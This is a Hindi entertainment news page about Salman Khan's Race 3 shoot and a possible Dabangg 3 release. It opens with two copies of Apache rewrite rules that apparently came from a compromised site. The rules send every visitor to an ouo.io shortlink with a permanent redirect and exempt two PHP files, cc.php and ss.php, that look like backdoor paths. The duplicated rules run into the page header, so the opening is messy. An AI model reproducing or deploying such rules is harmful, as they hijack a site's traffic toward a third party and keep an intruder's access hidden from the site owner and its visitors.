
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 680
मुंबई। बॉलीवुड के भाईजान इन दिनों फिल्म रेस—3 की शूटिंग में व्यस्त हैं। वहीं खबरें चल रही है कि सलमान खान दबंग—3 में अपने पुराने अंदाज में नजर आने वाले हैं। खबर है कि यह फिल्म इसी साल 7 दिसम्बर को रिलीज हो सकती है। सूत्रों के मुताबिक, सलमान और फिल्म ‘रेस 3’ की टीम 4 अप्रैल तक मुंबई लौटेगी जिसके बाद प्रभुदेवा ‘दबंग 3’ की स्क्रिप्ट को लेकर सलमान के साथ मीटिंग करेंगे और उन्हें फिल्म की स्क्रिप्ट से रूबरू कराएंगे।फिल्म से जुड़े हुए एक सूत्र ने बताया है कि, ‘फिल्म की स्क्रिप्ट पढ़कर जैसे ही सलमान खान हामी भर देंगे तो हम तुरंत शूटिंग शुरु कर देंगे। हो सकता है कि वह एक महीने के अंदर ही फिल्म की शूटिंग शुरु कर दें।’ बता दें कि रेस 3 की शूटिंग पहले ही अबू धाबी में शुरू हो चुकी है। इस फिल्म को साल की मोस्ट-अवेटेड फिल्म माना जा रहा है। 'रेस 3' को सलमान खान फिल्म्स और रमेश तौरानी की टिप्स फिल्म्स प्रड्यूस कर रहे हैं जबकि इसका डायरेक्शन रेमो डिसूजा कर रहे हैं। यह फिल्म इस साल ईद पर रिलीज होगी।